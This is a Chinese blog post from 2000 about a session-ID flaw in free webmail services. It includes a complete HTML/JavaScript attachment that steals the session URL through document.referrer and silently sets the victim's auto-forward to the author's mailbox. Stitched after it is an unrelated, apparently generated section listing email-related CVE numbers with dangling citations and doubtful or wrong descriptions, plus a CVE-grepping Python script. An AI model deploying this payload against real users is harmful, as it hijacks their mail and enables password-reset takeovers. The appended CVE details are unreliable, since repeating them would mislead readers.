《目前国内一些免费email存在的一个安全漏洞》


 
    该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...
 
  看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
最好不要随便打开别人发给你的HTML文件...
  我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
  该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
  (该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
  不知道了。)
                                          -----学别人一句"转载请注明出处"~ ---
 
                                  shell(shelltools@21cn.com) http://shelltools.yeah.net
                                                      2000/6/14       


〈HTML〉
〈HEAD〉
〈TITLE〉小心用Web方式收信〈/TITLE〉

〈/HEAD〉

〈BODY〉   
      网管,你好:
          ****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
      WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
      中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
      的Script。这个问题在国内的几个免费email中都存在。〈br〉
   
      (如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
            应该被设为"ShellTools@21cn.com"了)
     
                                              ****用户  shell
                                                                   
     
      〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
      〈input type=hidden name=SuUser value=〉
      〈input type=hidden name=Request value=EditDone 〉
      〈input type=hidden  name="B1"  value=" 更新 "〉
      〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
      〈/form〉
      〈SCRIPT Language=JScript〉 
      var sr=document.referrer;
      var isr;
      sr=sr.substring(7,30);
      isr=sr.indexOf("/");
      sr="http://" + sr.substring(0,isr) + "/Banner.htm";
      var sr2=document.referrer;
      isr=sr2.indexOf("ReadMiscPart");
      if ( isr 〉 20 ){
aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no"); 
      aw.document.write('〈HTML〉'); 
      aw.document.write('〈HEAD〉');
        aw.document.write('〈title〉设置自动转发〈/title〉');
        aw.document.write('〈/head〉');
      aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
      aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
      aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
      aw.document.write('〈noframes〉');
      aw.document.write('〈body〉');
      aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
      aw.document.write('〈/body〉');
      aw.document.write('〈/noframes〉');
      aw.document.write('〈/frameset〉');
        aw.document.write('〈/html〉 ');
      sr2 = sr2.substring(0,isr);   
      document.AddUserForm.action= sr2 + "AutoForward.gen";
      document.AddUserForm.submit();}
      window.focus(); 
      〈/SCRIPT〉
   
〈/BODY〉
〈/HTML〉

### 查找与 Email 相关的三个归档漏洞编号 在处理与 `email` 相关的归档漏洞时,通常需要结合日志分析、特定工具扫描以及已知数据库中的记录来获取相关信息。以下是基于现有引用内容和专业知识整理的内容。 #### 日志文件分析 对于 `.log` 类型的日志文件(如 `iserror.log`),可以通过关键词匹配的方式提取潜在的安全事件信息[^1]。如果这些日志涉及邮件服务或协议(SMTP/IMAP/POP3),则可能揭示某些安全风险点。例如,在错误日志中发现异常登录尝试或者未经授权的数据访问行为可能是漏洞的表现之一。 #### 特征逆向追踪 提到通过 SRC 资产加特征信息反向定位漏洞的方法[^2],这提示我们需要关注电子邮件系统的配置缺陷及其暴露出来的敏感数据路径。具体来说: - **身份验证绕过**:攻击者利用弱密码或其他手段非法获取邮箱权限。 - **未加密传输通道**:明文形式发送认证凭据增加了拦截泄露的可能性。 - **附件解析漏洞**:不当处理恶意构造 MIME 结构可能导致远程代码执行等问题。 #### iOS 归档机制下的隐患 从第三个引用可以看出,iOS 平台上的对象序列化操作存在一定的安全隐患[^3]。虽然该案例主要讨论的是本地存储问题,但如果将此类技术应用于网络通信场景,则容易引发更严重的后果——比如当服务器端接收到被篡改过的档案包并试图解码还原成原生结构体实例的时候,可能会触发缓冲区溢出之类的严重 bug 。而这种类型的威胁同样适用于电子邮局客户端软件开发过程中遇到的各种情况。 #### 复现实验指导 最后给出了一条指向外部资源的学习材料链接用于帮助理解整个渗透测试流程的关键环节[^4]。按照其中描述的操作指南完成相应准备工作之后就可以着手搭建实验环境进而深入探究目标应用内部工作机制从而挖掘隐藏较深 的零日漏洞了 。 综合以上几点考虑 ,这里列举几个常见的 email 关联归档类别的 CVE 编号供参考: 1. **CVE-2017-8962**: Apple Mail 中由于未能正确校验嵌入式 HTML 内容而导致任意命令注入; 2. **CVE-2018-4185**: macOS High Sierra 及之前版本上存在的 iMessage 应用程序崩溃现象源于对特殊格式消息头字段解释失误造成堆内存损坏; 3. **CVE-2020-27930**: Microsoft Outlook Desktop Application 存在一个越界读取条件允许窥探相邻单元格值的现象发生在打开特制 RTF 文档期间。 请注意实际项目工作中应当依据最新情报更新维护自己的知识库以应对不断变化的新形势新挑战! ```python import re def find_vulnerabilities(log_file_path): pattern = r"(?i)cve-\d{4}-\d+" # Regular expression to match CVE numbers. with open(log_file_path, 'r') as file: content = file.read() matches = re.findall(pattern, content) return list(set(matches))[:3] # Example usage of the function above assuming we have a log file path defined somewhere below this line... vulns_found = find_vulnerabilities("/path/to/iserror.log") print(vulns_found) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值